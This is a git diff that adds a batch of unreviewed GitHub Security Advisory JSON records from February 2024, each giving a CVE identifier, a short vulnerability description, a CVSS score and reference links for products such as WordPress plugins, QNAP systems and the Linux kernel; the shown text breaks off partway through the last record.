a/advisories/unreviewed/2024/02/GHSA-76q5-rvjr-8vhj/GHSA-76q5-rvjr-8vhj.json b/advisories/unreviewed/2024/02/GHSA-76q5-rvjr-8vhj/GHSA-76q5-rvjr-8vhj.json new file mode 100644 index 0000000000000..c700785536cbd --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-76q5-rvjr-8vhj/GHSA-76q5-rvjr-8vhj.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-76q5-rvjr-8vhj", + "modified": "2024-02-03T03:30:27Z", + "published": "2024-02-01T15:30:24Z", + "aliases": [ + "CVE-2024-24062" + ], + "details": "springboot-manager v1.6 is vulnerable to Cross Site Scripting (XSS) via /sys/role.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-24062" + }, + { + "type": "WEB", + "url": "https://github.com/By-Yexing/Vulnerability_JAVA/blob/main/2024/springboot-manager.md#12-stored-cross-site-scripting-sysrole" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-01T14:15:56Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-77c4-m4jj-64q2/GHSA-77c4-m4jj-64q2.json b/advisories/unreviewed/2024/02/GHSA-77c4-m4jj-64q2/GHSA-77c4-m4jj-64q2.json new file mode 100644 index 0000000000000..ac01f6e0a78d6 --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-77c4-m4jj-64q2/GHSA-77c4-m4jj-64q2.json @@ -0,0 +1,39 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-77c4-m4jj-64q2", + "modified": "2024-02-05T00:30:16Z", + "published": "2024-02-05T00:30:16Z", + "aliases": [ + "CVE-2024-25089" + ], + "details": "Malwarebytes Binisoft Windows Firewall Control before 6.9.9.2 allows remote attackers to execute arbitrary code via gRPC named pipes.", + "severity": [ + + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-25089" + }, + { + "type": "WEB", + "url": "https://hackerone.com/reports/2300061" + }, + { + "type": "WEB", + "url": "https://www.binisoft.org/changelog.txt" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-04T22:15:23Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-77pp-vwgv-x2jq/GHSA-77pp-vwgv-x2jq.json b/advisories/unreviewed/2024/02/GHSA-77pp-vwgv-x2jq/GHSA-77pp-vwgv-x2jq.json new file mode 100644 index 0000000000000..2c642dd2036c8 --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-77pp-vwgv-x2jq/GHSA-77pp-vwgv-x2jq.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-77pp-vwgv-x2jq", + "modified": "2024-02-01T12:30:22Z", + "published": "2024-02-01T12:30:22Z", + "aliases": [ + "CVE-2023-51540" + ], + "details": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Kunal Nagar Custom 404 Pro allows Stored XSS.This issue affects Custom 404 Pro: from n/a through 3.10.0.\n\n", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-51540" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/vulnerability/custom-404-pro/wordpress-custom-404-pro-plugin-3-10-0-cross-site-scripting-xss-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-01T11:15:10Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-78h2-jh6j-hhgf/GHSA-78h2-jh6j-hhgf.json b/advisories/unreviewed/2024/02/GHSA-78h2-jh6j-hhgf/GHSA-78h2-jh6j-hhgf.json new file mode 100644 index 0000000000000..15e265ec28d0e --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-78h2-jh6j-hhgf/GHSA-78h2-jh6j-hhgf.json @@ -0,0 +1,42 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-78h2-jh6j-hhgf", + "modified": "2024-02-06T00:30:27Z", + "published": "2024-02-06T00:30:27Z", + "aliases": [ + "CVE-2024-0586" + ], + "details": "The Essential Addons for Elementor – Best Elementor Templates, Widgets, Kits & WooCommerce Builders plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the Login/Register Element in all versions up to, and including, 5.9.4 due to insufficient input sanitization and output escaping on the custom login URL. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-0586" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/changeset/3022852/essential-addons-for-elementor-lite/tags/5.9.5/includes/Elements/Login_Register.php" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/c00ff4bd-d846-4e3f-95ed-2a6430c47ebf?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-05T22:16:02Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-78jq-x5w5-4mwh/GHSA-78jq-x5w5-4mwh.json b/advisories/unreviewed/2024/02/GHSA-78jq-x5w5-4mwh/GHSA-78jq-x5w5-4mwh.json new file mode 100644 index 0000000000000..9c15693a726f1 --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-78jq-x5w5-4mwh/GHSA-78jq-x5w5-4mwh.json @@ -0,0 +1,46 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-78jq-x5w5-4mwh", + "modified": "2024-02-02T21:31:29Z", + "published": "2024-02-02T21:31:29Z", + "aliases": [ + "CVE-2024-1189" + ], + "details": "A vulnerability has been found in AMPPS 2.7 and classified as problematic. Affected by this vulnerability is an unknown functionality of the component Encryption Passphrase Handler. The manipulation leads to denial of service. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. Upgrading to version 4.0 is able to address this issue. It is recommended to upgrade the affected component. The associated identifier of this vulnerability is VDB-252679. NOTE: The vendor explains that AMPPS 4.0 is a complete overhaul and the code was re-written.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-1189" + }, + { + "type": "WEB", + "url": "https://fitoxs.com/vuldb/15-exploit-perl.txt" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.252679" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.252679" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-404" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-02T19:15:08Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-78xj-cgh5-2h22/GHSA-78xj-cgh5-2h22.json b/advisories/unreviewed/2024/02/GHSA-78xj-cgh5-2h22/GHSA-78xj-cgh5-2h22.json new file mode 100644 index 0000000000000..20edd5ca0c3a2 --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-78xj-cgh5-2h22/GHSA-78xj-cgh5-2h22.json @@ -0,0 +1,35 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-78xj-cgh5-2h22", + "modified": "2024-02-08T18:30:39Z", + "published": "2024-02-08T18:30:39Z", + "aliases": [ + "CVE-2023-42282" + ], + "details": "An issue in NPM IP Package v.1.1.8 and before allows an attacker to execute arbitrary code and obtain sensitive information via the isPublic() function.", + "severity": [ + + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-42282" + }, + { + "type": "WEB", + "url": "https://cosmosofcyberspace.github.io/npm_ip_cve/npm_ip_cve.html" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-08T17:15:10Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-798f-8qgx-h85f/GHSA-798f-8qgx-h85f.json b/advisories/unreviewed/2024/02/GHSA-798f-8qgx-h85f/GHSA-798f-8qgx-h85f.json new file mode 100644 index 0000000000000..17174d4931b07 --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-798f-8qgx-h85f/GHSA-798f-8qgx-h85f.json @@ -0,0 +1,46 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-798f-8qgx-h85f", + "modified": "2024-02-08T15:30:27Z", + "published": "2024-02-08T15:30:27Z", + "aliases": [ + "CVE-2024-1312" + ], + "details": "A use-after-free flaw was found in the Linux kernel's Memory Management subsystem when a user wins two races at the same time with a fail in the mas_prev_slot function. This issue could allow a local user to crash the system.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-1312" + }, + { + "type": "WEB", + "url": "https://access.redhat.com/security/cve/CVE-2024-1312" + }, + { + "type": "WEB", + "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2225569" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/mm/memory.c?h=v6.8-rc3&id=657b5146955eba331e01b9a6ae89ce2e716ba306" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-416" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-08T13:15:09Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-7cgq-w654-fmv8/GHSA-7cgq-w654-fmv8.json b/advisories/unreviewed/2024/02/GHSA-7cgq-w654-fmv8/GHSA-7cgq-w654-fmv8.json new file mode 100644 index 0000000000000..f609d66f76331 --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-7cgq-w654-fmv8/GHSA-7cgq-w654-fmv8.json @@ -0,0 +1,50 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-7cgq-w654-fmv8", + "modified": "2024-02-06T00:30:27Z", + "published": "2024-02-06T00:30:27Z", + "aliases": [ + "CVE-2024-0869" + ], + "details": "The Instant Images – One Click Image Uploads from Unsplash, Openverse, Pixabay and Pexels plugin for WordPress is vulnerable to unauthorized arbitrary options update due to an insufficient check that neglects to verify whether the updated option belongs to the plugin on the instant-images/license REST API endpoint in all versions up to, and including, 6.1.0. This makes it possible for authors and higher to update arbitrary options.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-0869" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/instant-images/tags/6.1.0/api/license.php#L91" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/changeset/3027110/instant-images/tags/6.1.1/api/license.php" + }, + { + "type": "WEB", + "url": "https://wordpress.org/plugins/instant-images/" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/17941fbb-c5da-4f5c-a617-3792eb4ef395?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-05T22:16:06Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-7frw-5wm8-4qp7/GHSA-7frw-5wm8-4qp7.json b/advisories/unreviewed/2024/02/GHSA-7frw-5wm8-4qp7/GHSA-7frw-5wm8-4qp7.json new file mode 100644 index 0000000000000..374f28d34998c --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-7frw-5wm8-4qp7/GHSA-7frw-5wm8-4qp7.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-7frw-5wm8-4qp7", + "modified": "2024-02-07T21:30:27Z", + "published": "2024-02-07T21:30:27Z", + "aliases": [ + "CVE-2024-23769" + ], + "details": "Improper privilege control for the named pipe in Samsung Magician PC Software 8.0.0 (for Windows) allows a local attacker to read privileged data.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-23769" + }, + { + "type": "WEB", + "url": "https://semiconductor.samsung.com/support/quality-support/product-security-updates/" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-07T19:15:08Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-7jgr-v7qj-qqxj/GHSA-7jgr-v7qj-qqxj.json b/advisories/unreviewed/2024/02/GHSA-7jgr-v7qj-qqxj/GHSA-7jgr-v7qj-qqxj.json new file mode 100644 index 0000000000000..17c9b44770716 --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-7jgr-v7qj-qqxj/GHSA-7jgr-v7qj-qqxj.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-7jgr-v7qj-qqxj", + "modified": "2024-02-06T06:30:31Z", + "published": "2024-02-06T06:30:31Z", + "aliases": [ + "CVE-2023-33068" + ], + "details": "Memory corruption in Audio while processing IIR config data from AFE calibration block.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-33068" + }, + { + "type": "WEB", + "url": "https://www.qualcomm.com/company/product-security/bulletins/february-2024-bulletin" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-06T06:16:00Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-7jrg-2597-p2hc/GHSA-7jrg-2597-p2hc.json b/advisories/unreviewed/2024/02/GHSA-7jrg-2597-p2hc/GHSA-7jrg-2597-p2hc.json new file mode 100644 index 0000000000000..a18c3a6de693f --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-7jrg-2597-p2hc/GHSA-7jrg-2597-p2hc.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-7jrg-2597-p2hc", + "modified": "2024-02-07T00:30:25Z", + "published": "2024-02-07T00:30:25Z", + "aliases": [ + "CVE-2023-40544" + ], + "details": "\n\n\n\n\n\n\n\n\n\n\nAn attacker with access to the network where the affected devices are located could maliciously actions to obtain, via a sniffer, sensitive information exchanged via TCP communications.\n\n\n\n", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:A/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-40544" + }, + { + "type": "WEB", + "url": "https://www.cisa.gov/news-events/ics-advisories/icsa-24-023-04" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-319" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-06T22:16:13Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-7m74-4w6g-p6gf/GHSA-7m74-4w6g-p6gf.json b/advisories/unreviewed/2024/02/GHSA-7m74-4w6g-p6gf/GHSA-7m74-4w6g-p6gf.json new file mode 100644 index 0000000000000..979f1f010dafd --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-7m74-4w6g-p6gf/GHSA-7m74-4w6g-p6gf.json @@ -0,0 +1,42 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-7m74-4w6g-p6gf", + "modified": "2024-02-06T00:30:27Z", + "published": "2024-02-06T00:30:27Z", + "aliases": [ + "CVE-2024-0699" + ], + "details": "The AI Engine: Chatbots, Generators, Assistants, GPT 4 and more! plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in the 'add_image_from_url' function in all versions up to, and including, 2.1.4. This makes it possible for authenticated attackers, with Editor access and above, to upload arbitrary files on the affected site's server which may make remote code execution possible.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-0699" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/changeset/3021494/ai-engine/trunk/classes/core.php" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/0a86f6ed-9755-4265-bc0d-2d0e18e9982f?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-05T22:16:04Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-7mgj-p9v3-3vxr/GHSA-7mgj-p9v3-3vxr.json b/advisories/unreviewed/2024/02/GHSA-7mgj-p9v3-3vxr/GHSA-7mgj-p9v3-3vxr.json new file mode 100644 index 0000000000000..18dd92a8414ac --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-7mgj-p9v3-3vxr/GHSA-7mgj-p9v3-3vxr.json @@ -0,0 +1,39 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-7mgj-p9v3-3vxr", + "modified": "2024-02-07T00:30:26Z", + "published": "2024-02-07T00:30:26Z", + "aliases": [ + "CVE-2024-1283" + ], + "details": "Heap buffer overflow in Skia in Google Chrome prior to 121.0.6167.160 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High)", + "severity": [ + + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-1283" + }, + { + "type": "WEB", + "url": "https://chromereleases.googleblog.com/2024/02/stable-channel-update-for-desktop.html" + }, + { + "type": "WEB", + "url": "https://issues.chromium.org/issues/41494860" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-07T00:15:56Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-7mjm-4vrc-ghvc/GHSA-7mjm-4vrc-ghvc.json b/advisories/unreviewed/2024/02/GHSA-7mjm-4vrc-ghvc/GHSA-7mjm-4vrc-ghvc.json new file mode 100644 index 0000000000000..fb76e1fc8e905 --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-7mjm-4vrc-ghvc/GHSA-7mjm-4vrc-ghvc.json @@ -0,0 +1,43 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-7mjm-4vrc-ghvc", + "modified": "2024-02-02T03:30:32Z", + "published": "2024-02-02T03:30:32Z", + "aliases": [ + "CVE-2023-50934" + ], + "details": "IBM PowerSC 1.3, 2.0, and 2.1 uses single-factor authentication which can lead to unnecessary risk of compromise when compared with the benefits of a dual-factor authentication scheme. IBM X-Force ID: 275114.\n\n", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-50934" + }, + { + "type": "WEB", + "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/275114" + }, + { + "type": "WEB", + "url": "https://www.ibm.com/support/pages/node/7113759" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-287", + "CWE-308" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-02T02:15:16Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-7pjv-fxwg-c5c3/GHSA-7pjv-fxwg-c5c3.json b/advisories/unreviewed/2024/02/GHSA-7pjv-fxwg-c5c3/GHSA-7pjv-fxwg-c5c3.json new file mode 100644 index 0000000000000..92685e38adb2d --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-7pjv-fxwg-c5c3/GHSA-7pjv-fxwg-c5c3.json @@ -0,0 +1,42 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-7pjv-fxwg-c5c3", + "modified": "2024-02-02T15:30:28Z", + "published": "2024-02-02T15:30:28Z", + "aliases": [ + "CVE-2023-47144" + ], + "details": "IBM Tivoli Application Dependency Discovery Manager 7.3.0.0 through 7.3.0.10 is vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. IBM X-Force ID: 270271.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-47144" + }, + { + "type": "WEB", + "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/270271" + }, + { + "type": "WEB", + "url": "https://www.ibm.com/support/pages/node/7105139" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-02T13:15:08Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-7pr9-232f-3fgg/GHSA-7pr9-232f-3fgg.json b/advisories/unreviewed/2024/02/GHSA-7pr9-232f-3fgg/GHSA-7pr9-232f-3fgg.json new file mode 100644 index 0000000000000..225e29cfa4654 --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-7pr9-232f-3fgg/GHSA-7pr9-232f-3fgg.json @@ -0,0 +1,39 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-7pr9-232f-3fgg", + "modified": "2024-02-08T03:32:45Z", + "published": "2024-02-08T03:32:45Z", + "aliases": [ + "CVE-2024-24021" + ], + "details": "A SQL injection vulnerability exists in Novel-Plus v4.3.0-RC1 and prior. An attacker can pass specially crafted offset, limit, and sort parameters to perform SQL injection via /novel/userFeedback/list.", + "severity": [ + + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-24021" + }, + { + "type": "WEB", + "url": "https://github.com/201206030/novel-plus" + }, + { + "type": "WEB", + "url": "https://github.com/cxcxcxcxcxcxcxc/cxcxcxcxcxcxcxc/blob/main/cxcxcxcxcxc/about-2024/24021.txt" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-08T02:15:07Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-7pxx-x33w-55ch/GHSA-7pxx-x33w-55ch.json b/advisories/unreviewed/2024/02/GHSA-7pxx-x33w-55ch/GHSA-7pxx-x33w-55ch.json new file mode 100644 index 0000000000000..8cb69acefc822 --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-7pxx-x33w-55ch/GHSA-7pxx-x33w-55ch.json @@ -0,0 +1,35 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-7pxx-x33w-55ch", + "modified": "2024-02-07T21:30:27Z", + "published": "2024-02-07T21:30:27Z", + "aliases": [ + "CVE-2024-24488" + ], + "details": "An issue in Shenzen Tenda Technology CP3V2.0 V11.10.00.2311090948 allows a local attacker to obtain sensitive information via the password component.", + "severity": [ + + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-24488" + }, + { + "type": "WEB", + "url": "https://github.com/minj-ae/CVE-2024-24488" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-07T20:15:49Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-7vp4-2f38-rg78/GHSA-7vp4-2f38-rg78.json b/advisories/unreviewed/2024/02/GHSA-7vp4-2f38-rg78/GHSA-7vp4-2f38-rg78.json new file mode 100644 index 0000000000000..84060f09bab42 --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-7vp4-2f38-rg78/GHSA-7vp4-2f38-rg78.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-7vp4-2f38-rg78", + "modified": "2024-02-02T18:30:31Z", + "published": "2024-02-02T18:30:31Z", + "aliases": [ + "CVE-2023-41276" + ], + "details": "A buffer copy without checking size of input vulnerability has been reported to affect several QNAP operating system versions. If exploited, the vulnerability could allow authenticated administrators to execute code via a network.\n\nWe have already fixed the vulnerability in the following versions:\nQTS 5.1.2.2533 build 20230926 and later\nQuTS hero h5.1.2.2534 build 20230927 and later\nQuTScloud c5.1.5.2651 and later\n", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:N/I:L/A:L" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-41276" + }, + { + "type": "WEB", + "url": "https://www.qnap.com/en/security-advisory/qsa-23-38" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-120" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-02T16:15:48Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-7vw2-84h4-6844/GHSA-7vw2-84h4-6844.json b/advisories/unreviewed/2024/02/GHSA-7vw2-84h4-6844/GHSA-7vw2-84h4-6844.json new file mode 100644 index 0000000000000..b2869230efa53 --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-7vw2-84h4-6844/GHSA-7vw2-84h4-6844.json @@ -0,0 +1,39 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-7vw2-84h4-6844", + "modified": "2024-02-06T06:30:30Z", + "published": "2024-02-06T06:30:30Z", + "aliases": [ + "CVE-2024-23304" + ], + "details": "Cybozu KUNAI for Android 3.0.20 to 3.0.21 allows a remote unauthenticated attacker to cause a denial-of-service (DoS) condition by performing certain operations.", + "severity": [ + + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-23304" + }, + { + "type": "WEB", + "url": "https://cs.cybozu.co.jp/2024/010691.html" + }, + { + "type": "WEB", + "url": "https://jvn.jp/en/jp/JVN18743512/" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-06T05:15:10Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-7w35-q47q-mvqv/GHSA-7w35-q47q-mvqv.json b/advisories/unreviewed/2024/02/GHSA-7w35-q47q-mvqv/GHSA-7w35-q47q-mvqv.json new file mode 100644 index 0000000000000..a7eec11e3d334 --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-7w35-q47q-mvqv/GHSA-7w35-q47q-mvqv.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-7w35-q47q-mvqv", + "modified": "2024-02-02T18:30:31Z", + "published": "2024-02-02T18:30:31Z", + "aliases": [ + "CVE-2023-45035" + ], + "details": "A buffer copy without checking size of input vulnerability has been reported to affect several QNAP operating system versions. If exploited, the vulnerability could allow authenticated administrators to execute code via a network.\n\nWe have already fixed the vulnerability in the following versions:\nQTS 5.1.4.2596 build 20231128 and later\nQuTS hero h5.1.4.2596 build 20231128 and later\nQuTScloud c5.1.5.2651 and later\n", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:L/A:L" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-45035" + }, + { + "type": "WEB", + "url": "https://www.qnap.com/en/security-advisory/qsa-23-46" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-120" + ], + "severity": "LOW", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": 